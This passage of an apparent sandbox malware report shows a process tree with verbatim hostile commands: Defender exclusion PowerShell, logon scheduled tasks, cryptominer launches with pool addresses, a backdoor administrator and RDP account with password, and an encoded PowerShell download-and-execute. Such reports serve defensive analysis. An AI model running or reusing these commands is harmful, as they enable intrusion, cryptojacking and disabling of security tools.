                                                                                                                                                                                                                          cmd /c net start TermService
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                                                                                                              net start TermService
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:5548
                                                                                                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                  C:\Windows\system32\net1 start TermService
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6752
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2136
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8CE6.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8CE6.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              PID:3396
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8CE6.exe" & exit
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:6428
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                    timeout /t 5
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:5768
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9071.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9071.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\968C.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\968C.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4796
                                                                                                                                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\968C.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6148
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5400
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:5596
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1332
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:5632
                                                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:4556
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                                                                        • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:7000
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=43m2K5awHfSB4ZtTTJepVVjkWDTnExdqDaHKwv9thKTK9dZAJwzUACebcQnZqMPRLS4keNBn7ZVNdUxtCTCPAx7D43jcvdC --pass= --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:5260
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9CA8.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9CA8.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:6452
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\mine.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:1084
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:2764
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:2016
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1560
                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:564
                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                    "cmd" cmd /c "C:\Users\Admin\services32.exe"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:5380
                                                                                                                                                                                                                                                                      • C:\Users\Admin\services32.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\services32.exe
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:1624
                                                                                                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:5052
                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6388
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:4712
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:2544
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:6080
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\\conhost.exe" "/sihost32"
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:3932
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A275.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A275.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Accesses Microsoft Outlook accounts
                                                                                                                                                                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                                              • outlook_office_path
                                                                                                                                                                                                                                                                              • outlook_win_path
                                                                                                                                                                                                                                                                              PID:4828
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A275.exe"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1112
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                    PID:6348
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AAC3.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\AAC3.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                PID:6392
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\B747.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\B747.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                PID:4864
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2soft.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2soft.exe"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:5180
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2soft.exe"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4992
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:6208
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                            "cmd" cmd /c taskkill /f /PID "7000"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:1872
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                taskkill /f /PID "7000"
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                PID:764
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:5464
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:3080
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                      PID:6384
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:4628
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:6440
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=FEOInoh0923y0h09)))((hgus --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=40 --cinit-stealth --cinit-kill
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BCE6.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BCE6.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:2856
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 280
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                      PID:7012
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2856 -ip 2856
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:1532
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                    cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:2404
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                        net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:2956
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:1368
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd /C net.exe user WgaUtilAcc IiYKe16o /add
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:1696
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                              net.exe user WgaUtilAcc IiYKe16o /add
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 user WgaUtilAcc IiYKe16o /add
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:6004
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:6364
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                                    net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:3400
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:204
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" YJTUIPJF$ /ADD
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                                          net.exe LOCALGROUP "Remote Desktop Users" YJTUIPJF$ /ADD
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:7012
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" YJTUIPJF$ /ADD
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2856
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:1420
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                                                net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:5816
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:2360
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd /C net.exe user WgaUtilAcc IiYKe16o
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5048
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                                                                                                      net.exe user WgaUtilAcc IiYKe16o
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:3740
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\net1 user WgaUtilAcc IiYKe16o
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:6544
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        cmd.exe /C wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:684
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                            wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:6048
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                            cmd.exe /C wmic CPU get NAME
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:2616
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                wmic CPU get NAME
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3440
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6172
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:4848

                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                                                                                  Account Manipulation

                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                  T1098

                                                                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                  T1088

                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                                                                                                  T1089

